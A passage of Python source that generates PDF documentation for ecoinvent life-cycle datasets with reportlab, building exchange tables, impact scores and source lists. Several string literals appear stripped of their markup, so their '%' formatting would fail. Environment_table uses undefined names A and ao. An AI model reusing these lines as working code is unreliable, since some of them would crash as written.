'))\n stars += 1\n elif sel['amount'].min() < 0.:\n 1/0\n else:\n s = 'Inputs from technosphere'\n if group != 'FromTechnosphere':\n colWidths = [3.9*inch, 0.9*inch, 1.*inch, amount_width]\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Material for treatment', large_table_style), \n Paragraph('Byproduct classif.', large_table_style), \n Paragraph('Amount', large_table_style)]]\n else:\n colWidths = [5.8*inch, amount_width]\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n name = f.get_reference_product().name\n name_list = list(set(sel['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel1 = sel[sel['name'] == name]\n amount = sel1['amount'].sum()\n if group != 'FromTechnosphere':\n if utils.is_empty(sel1.iloc[0]['mft']):\n mft = ''\n else:\n mft = sel1.iloc[0]['mft']\n if utils.is_empty(sel1.iloc[0]['mft']):\n bpc = ''\n else:\n bpc = sel1.iloc[0]['By-product classification']\n table_content.append([Paragraph(name, large_table_style),\n Paragraph(mft, large_table_style), \n Paragraph(bpc, large_table_style), \n '%s %s' % (utils.arrange_float(amount), sel1.iloc[0]['unitName'])])\n else:\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel1.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_cutoff(exchange_df, Story):\n sel = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n colWidths = [4.9*inch, 0.9*inch, amount_width]\n table_style = [\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey)]\n s = 'Reference product'\n stars = 1\n footnotes = []\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity, or a market linking to treatment activities.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Byproduct classif.', large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_content.append([Paragraph(sel.iloc[0]['name'], large_table_style),\n Paragraph(sel.iloc[0]['By-product classification'], large_table_style), \n '%s %s' % (utils.arrange_float(sel.iloc[0]['amount']), sel.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n try:\n if f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1]:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n except:\n pass\n Story.append(t)\n if (not hasattr(f, 'dataGeneratorAndPublication')) or f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(1,0),(1,0),'RIGHT'), 
#valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (1,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ]\n sel = exchange_df[exchange_df['group'] == 'FromTechnosphere']\n colWidths = [5.8*inch, amount_width]\n cats = ['allocatable product', 'Recyclable', 'Waste']\n for cat in cats:\n table_style_ = deepcopy(table_style)\n sel1 = sel[sel['By-product classification'] == cat]\n if len(sel1) > 0:\n if cat == 'allocatable product':\n s = 'Inputs from technosphere'\n elif cat == 'Waste':\n s = 'Inputs from technosphere, wastes' + '*'*stars\n footnotes.append(('*'*stars, 'A negative input indicates a by-product output of waste.'))\n stars += 1\n else:\n s = 'Inputs from technosphere, recyclable materials' + '*'*stars\n footnotes.append(('*'*stars, 'A negative input indicates a by-product output of recyclable material.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n name = f.get_reference_product().name\n name_list = list(set(sel1['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel2 = sel1[sel1['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_consequential(exchange_df, Story):\n sel = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n colWidths = [4.9*inch, 0.9*inch, amount_width]\n table_style = [\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey)]\n s = 'Reference product'\n stars = 1\n footnotes = []\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity, or a market linking to treatment activities.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Material for treatment', large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_content.append([Paragraph(sel.iloc[0]['name'], large_table_style),\n Paragraph(sel.iloc[0]['mft'], large_table_style), \n '%s %s' % (utils.arrange_float(sel.iloc[0]['amount']), sel.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n if f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1]:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(t)\n if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), 
colors.lightgrey), \n ('INNERGRID', (1,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black)\n ]\n sel = exchange_df[exchange_df['group'] == 'FromTechnosphere']\n sel = sel[sel['mft'] == 'no']\n colWidths = [5.8*inch, amount_width]\n l = [('normal', sel[sel['amount'] > 0], ''), \n ('credit', sel[sel['amount'] < 0], \n 'Following the consequential approach, these negative inputs act as credits for avoided production.'), \n ('wastes', exchange_df[exchange_df['mft'] == 'yes'], \n 'These exchanges listed as negative inputs are by-products requiring treatment. They carry the burdens of their treatments, and include credits for beneficial treatment in this system model.')\n ]\n for material, sel1, explanations in l:\n if len(sel1) > 0:\n if material == 'normal':\n s = 'Inputs from technosphere'\n if material == 'credit':\n s = 'Inputs from technosphere, credit for by-products'\n s += '*'*stars\n footnotes.append(('*'*stars, explanations))\n stars += 1\n if material == 'wastes':\n s = 'Inputs from technosphere, wastes'\n s += '*'*stars\n footnotes.append(('*'*stars, explanations))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_style_ = deepcopy(table_style)\n name = f.get_reference_product().name\n name_list = list(set(sel1['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel2 = sel1[sel1['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_APOS(exchange_df, Story):\n sel = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n colWidths = [4.9*inch, 0.9*inch, amount_width]\n table_style = [\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey)]\n s = 'Reference product'\n stars = 1\n footnotes = []\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity or a market linking to treatment activities.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Material for treatment', large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_content.append([Paragraph(sel.iloc[0]['name'], large_table_style),\n Paragraph(sel.iloc[0]['mft'], large_table_style), \n '%s %s' % (utils.arrange_float(sel.iloc[0]['amount']), sel.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n if f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1]:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(t)\n if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for 
all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (1,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black)\n ]\n sel = exchange_df[exchange_df['group'] == 'FromTechnosphere']\n colWidths = [5.8*inch, amount_width]\n l = [('no', sel[sel['mft'] == 'no'], ''), \n ('yes', sel[sel['mft'] == 'yes'], 'A negative input represents an output of by-product requiring treatment. It carries the burdens of its treatment, and a credit for beneficial treatment calculated by allocation in this system model.' \n )]\n for material, sel1, explanations in l:\n if len(sel1) > 0:\n if material == 'no':\n s = 'Inputs from technosphere'\n if material == 'yes':\n s = 'Inputs from technosphere, wastes'\n s += '*'*stars\n footnotes.append(('*'*stars, explanations))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_style_ = deepcopy(table_style)\n name = f.get_reference_product().name\n name_list = list(set(sel1['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel2 = sel1[sel1['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_elementary(exchange_df, Story):\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (0,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ]\n colWidths = [5.8*inch, amount_width]\n for compartment, s in [('natural resource', 'Inputs from environment'), \n ('air', 'Emissions to air'), ('water', 'Emissions to water'), \n ('soil', 'Emissions to soil')]:\n sel = exchange_df[exchange_df['compartment'] == compartment]\n if len(sel) > 0:\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n l = list(set(sel['name']))\n l.sort()\n for name in l:\n sel2 = sel[sel['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n if 'Transformation, from unspecified' in name:\n pass\n #1/0\n #print inner_table\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story\ndef write_footnotes(Story, footnotes):\n if len(footnotes) > 0:\n #Story[-1].keepWithNext = True\n for footnote in footnotes:\n Story.append(Paragraph('%s%s' % footnote, small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n return Story\ndef amount_cell(f, sel, i, A):\n rel_contrib = get_relative_contributions(f, sel.iloc[i], A)\n contrib_arranged = []\n for k in range(len(rel_contrib)):\n 
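#rel_contrib holds pre-formatted strings (e.g. ['12', '<0.1']); the '%' sign is appended only here, so the legend row printed under the amount reads '12% | <0.1%'\n        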
contrib_arranged.append(rel_contrib[k] + '%')\n a = [[Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)],\n [Paragraph(' | '.join(contrib_arranged), small_justified_contrib)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('LEFTPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('RIGHTPADDING', (0,0), (-1,-1), 0))\n a.setStyle(TableStyle(table_style_a))\n return a\ndef Technosphere_table(f, exchange_df, Story, ao, logs, A):\n tags = {'ReferenceProduct': 'Reference product', \n 'ReferenceProducts': 'Reference products', \n 'ByProduct': 'By-product', \n 'ByProducts': 'By-products', \n 'FromTechnosphere': 'Input from technosphere', \n 'FromTechnospheres': 'Inputs from technosphere', \n }\n Story.append(Paragraph('
Detailed information for exchanges', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n Story = contribution_to_impact_legend(Story)\n for group in ['ReferenceProduct', 'ByProduct', 'FromTechnosphere']:\n sel = exchange_df[exchange_df['group'] == group].sort(columns = 'name')\n if len(sel) > 0:\n if group == 'FromTechnosphere' and f.specialActivityType in [1, 10]:\n ref = f.get_reference_product()\n sel_ = sel[sel['name'] == ref.name]\n sel_ = sel_.sort('amount', ascending = False)\n sel = pandas.concat([sel_, sel[sel['name'] != ref.name]])\n #setting up the header\n if len(getattr(f, group)) > 1:\n tag = tags[group+'s']\n else:\n tag = tags[group]\n if group == 'FromTechnosphere':\n if f.get('modellingAndValidation').get('systemModelName') == 'Undefined':\n colWidths = [7.*inch - amount_width, amount_width]\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Amount', large_table_style)]]\n else:\n colWidths = [7.*inch - amount_width, amount_width]\n if len(indicators_for_contrib_short) > 0:\n a = [[Paragraph('Amount', large_table_style)],\n [Paragraph('impact contributions', small_justified_contrib)]]\n else:\n a = [[Paragraph('Amount', large_table_style)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 0))\n a.setStyle(TableStyle(table_style_a))\n table_content = [[Paragraph('%s' % tag, large_table_style), a]]\n else:\n colWidths = [7.*inch - amount_width - prod_vol_width,\n prod_vol_width, amount_width]\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Annual prod.vol.', large_table_style), \n Paragraph('Amount', large_table_style)\n ]]\n table_style = []\n for i in range(len(sel)):\n if group == 'FromTechnosphere':\n if f.get('modellingAndValidation').get('systemModelName') == 'Undefined':\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n else:\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n amount_cell(f, sel, i, A)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n else: #byproduct or reference product\n if utils.is_empty(sel.iloc[i]['productionVolumeAmount']) or sel.iloc[i]['productionVolumeAmount'] == 0.:\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('NA', small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n else:\n prod_vol = utils.arrange_float(sel.iloc[i]['productionVolumeAmount'])\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('%s %s' % (prod_vol,sel.iloc[i]['unitName']), small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n to_write, logs, length_to_write = arrange_comments(f, sel.iloc[i], 
ao, logs)\n line = ['']*len(colWidths)\n line[0] = to_write\n inner_table.append(line)\n inner_t = Table(inner_table, colWidths = colWidths)\n inner_t.setStyle(TableStyle(inner_table_style))\n line = ['']*len(colWidths)\n line[0] = inner_t\n if sel.iloc[i]['amount'] != 0.:\n table_content.append(line)\n table_style.append(('SPAN',(0,len(table_content)-1),(-1,len(table_content)-1)))\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n table_style.append(('LEFTPADDING', (0,1), (0,-1), 0))\n table_style.append(('TOPPADDING', (0,1), (0,-1), 0))\n table_style.extend(h_header)\n table_style.append(('BOTTOMPADDING', (0,0), (-1,1), 3))\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story, logs\ndef Technosphere_table_linked_market(f, exchange_df, Story, ao, logs, A):\n Story.append(Paragraph('Detailed information for exchanges', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n p = 'To help better understand this market dataset, inputs from technosphere are displayed in distinct categories: supplies to the market as one category, then losses and other inputs if they occur within the market. '\n Story.append(Paragraph(p, no_info_style))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story = contribution_to_impact_legend(Story)\n to_write = []\n group = 'ReferenceProduct'\n sel = exchange_df[exchange_df['group'] == group].sort(columns = 'name')\n to_write.append(('Reference product', 'Reference product', sel.copy()))\n group = 'FromTechnosphere'\n sel = exchange_df[exchange_df['group'] == group].sort(columns = 'name')\n ref = f.get_reference_product()\n supply_of_reference_product = sel[sel['name'] == ref.name]\n supply_of_reference_product = supply_of_reference_product.sort('amount', ascending = False)\n loss = supply_of_reference_product[supply_of_reference_product[\n 'activityLinkId'] == f.id]\n if len(loss) > 0:\n supply_of_reference_product = supply_of_reference_product[supply_of_reference_product[\n 'activityLinkId'] != f.id]\n if len(supply_of_reference_product) == 1:\n to_write.append(('input of reference product', 'Input of %s' % ref.name, supply_of_reference_product.copy()))\n else:\n to_write.append(('input of reference product', 'Inputs of %s' % ref.name, supply_of_reference_product.copy()))\n if len(loss) > 0:\n to_write.append(('losses', 'Compensation for losses', loss.copy()))\n supply_of_others = sel[sel['name'] != ref.name]\n if len(supply_of_others) == 1:\n to_write.append(('Other', 'Other input from technosphere', supply_of_others.copy()))\n elif len(supply_of_others) > 1:\n to_write.append(('Other', 'Other inputs from technosphere', supply_of_others.copy()))\n for section, tag, sel in to_write:\n if section == 'Reference product':\n colWidths = [7.*inch - amount_width - prod_vol_width,\n prod_vol_width, amount_width]\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Annual prod.vol.', large_table_style), \n Paragraph('Amount', large_table_style)\n ]]\n else:\n colWidths = [7.*inch - amount_width, amount_width]\n if len(indicators_for_contrib_short) > 0:\n a = [[Paragraph('Amount', large_table_style)],\n [Paragraph('impact contributions', small_justified_contrib)]]\n else:\n a = 
[[Paragraph('Amount', large_table_style)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 0))\n a.setStyle(TableStyle(table_style_a))\n table_content = [[Paragraph('%s' % tag, large_table_style), a]]\n table_style = []\n for i in range(len(sel)):\n if tag != 'Reference product':\n exc = find_exc(sel.iloc[i], f)\n if 'Compensation for ' in tag:\n name = exc.name\n else:\n name = '%s - %s' % find_activityLink(exc)\n if '<' in name:\n pieces = name.split('<')\n new_name = '%s' % (ecoinvent_red, pieces[0])\n for piece in pieces[1:]:\n new_name += '<' % ecoinvent_red\n new_name += '%s' % (ecoinvent_red, piece)\n name = copy(new_name)\n inner_table = [[Paragraph(name, small_table_style), \n amount_cell(f, sel, i, A)]]\n else: \n prod_vol = utils.arrange_float(sel.iloc[i]['productionVolumeAmount'])\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('%s %s' % (prod_vol,sel.iloc[i]['unitName']), small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n to_write, logs, length_to_write = arrange_comments(f, sel.iloc[i], ao, logs, \n AL = section in ['losses', 'Other'])\n line = ['']*len(colWidths)\n line[0] = to_write\n inner_table.append(line)\n inner_t = Table(inner_table, colWidths = colWidths)\n inner_t.setStyle(TableStyle(inner_table_style))\n line = ['']*len(colWidths)\n line[0] = inner_t\n if sel.iloc[i]['amount'] != 0.:\n table_content.append(line)\n table_style.append(('SPAN',(0,len(table_content)-1),(-1,len(table_content)-1)))\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n #table_style.append(('LEFTPADDING', (0,1), (0,-1), 0))\n #table_style.append(('TOPPADDING', (0,1), (0,-1), 0))\n table_style.extend(h_header)\n #table_style.append(('BOTTOMPADDING', (0,0), (-1,1), 3))\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story, logs\ndef Environment_table(f, exchange_df, Story, logs):\n colWidths = [7.*inch - amount_width - subcompartment_width, subcompartment_width, amount_width]\n for compartment in ['natural resource', 'air', 'water', 'soil']:\n sel = exchange_df[exchange_df['compartment'] == compartment].sort(columns = 'name')\n if len(sel) > 0:\n tag = compartment_header(compartment)\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Subcompartment', large_table_style), \n Paragraph('Amount', large_table_style)]]\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n if len(indicators_for_contrib_short) > 0:\n a = [[Paragraph('Amount', large_table_style)],\n [Paragraph('impact contributions', small_justified_contrib)]]\n else:\n a = [[Paragraph('Amount', large_table_style)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 3))\n a.setStyle(TableStyle(table_style_a))\n table_content[0][-1] = deepcopy(a)\n table_style = []\n for i in range(len(sel)):\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph(sel.iloc[i]['subcompartment'], small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n if f.get('modellingAndValidation').get('systemModelName') 
!= 'Undefined':\n inner_table[0][-1] = amount_cell(f, sel, i, A)\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n to_write, logs, length_to_write = arrange_comments(f, sel.iloc[i], ao, logs)\n line = ['']*len(colWidths)\n line[0] = to_write\n inner_table.append(line)\n inner_t = Table(inner_table, colWidths = colWidths)\n inner_t.setStyle(TableStyle(inner_table_style))\n line = ['']*len(colWidths)\n line[0] = inner_t\n table_content.append(line)\n table_style.append(('SPAN',(0,len(table_content)-1),(-1,len(table_content)-1)))\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n table_style.append(('LEFTPADDING', (0,1), (0,-1), 0))\n table_style.append(('TOPPADDING', (0,1), (0,-1), 0))\n table_style.extend(h_header)\n table_style.append(('BOTTOMPADDING', (0,0), (-1,1), 3))\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story, logs\ndef impact_scores(Story, f):\n Story.append(Spacer(1, inter_par_dist))\n Story.append(Paragraph('Selected impact assessment results', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n table_content = [[Paragraph('method', large_table_style), \n Paragraph('category', large_table_style), \n Paragraph('indicator', large_table_style), \n Paragraph('score', large_table_style)]]\n for exc in f.ReferenceProduct:\n if exc.amount != 0:\n break\n ie = (f.activityName, f.geography, exc.name)\n scores = utils.pkl_load(scores_path, str(indexes.toggle['ie'][ie]))\n for LCIA in indicators:\n method, category, indicator = LCIA\n try:\n s = scores[indexes.toggle['LCIA'][LCIA],0]\n except IndexError:\n s = scores[0,indexes.toggle['LCIA'][LCIA]]\n table_content.append([Paragraph(method, large_table_style), \n Paragraph(category, large_table_style), \n Paragraph(indicator, large_table_style), \n Paragraph('%s %s' % (utils.arrange_float(s, significative_digits = 4), \n indexes.units[LCIA]), large_table_style)])\n colWidths = [2.*inch, 1.75*inch, 1.75*inch, 1.5*inch]\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(h_header))\n Story.append(t)\n Story.append(Spacer(1, inter_par_dist))\n return Story, ie\ndef print_source_list(Story, exchange_df, f, MD):\n if len(exchange_df) > 0:\n s = set(exchange_df['sourceId'])\n else:\n s = set()\n try:\n if (hasattr(f.dataGeneratorAndPublication, 'publishedSourceId') and \n f.dataGeneratorAndPublication.publishedSourceId != None):\n s.add(f.dataGeneratorAndPublication.publishedSourceId)\n except:\n pass\n source_list = set()\n for source in s:\n if not utils.is_empty(source) and type(source) == str:\n source_list.add(source)\n Story.append(Paragraph('Source', title_style))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n source_list = list(source_list)\n if len(source_list) > 0:\n md = MD['Sources'].loc[source_list]\n if not (len(md) == 1 and source_list[0] not in MD['Sources'].index):\n headers = ['firstAuthor', 'additionalAuthors', 'title', 'year', 'journal', \n 'volumeNo', 'issueNo']\n tags = ['First author', 'Additional author(s)', 'Title', 'Year', 'Journal', 
\n 'Volume number', 'Issue number']\n header_to_tag = dict(zip(headers, tags))\n table_content = [[Paragraph('Source information', header_style)]]\n for i in range(len(md)):\n to_write = []\n for header in headers:\n if type(md.iloc[i][header]) in [str] and not utils.is_empty(md.iloc[i][header]):\n to_write.append(Paragraph('%s: %s' % (header_to_tag[header], md.iloc[i][header]), header_style))\n table_content.append([to_write])\n t = Table(table_content, colWidths = [7*inch], splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(h_header))\n Story.append(t)\n else:\n Story.append(Paragraph('No source cited in this dataset', no_info_style))\n return Story\ndef render(Story, f, doc, version):\n pieces = utils.break_pieces(f.activityName, 80)\n pieces[-1] += ' - ' + f.geography\n def myFirstPage(canvas, doc):\n canvas.saveState()\n canvas.setFont('Helvetica-Bold',16)\n header_text = 'Ecoinvent %s dataset documentation' % version\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-35, header_text)\n canvas.setFont('Helvetica',9)\n height = 50\n for piece in pieces:\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-height, piece)\n height += .15*inch\n canvas.drawImage(logo_path, MARGIN*1.3, 750, width = inch, 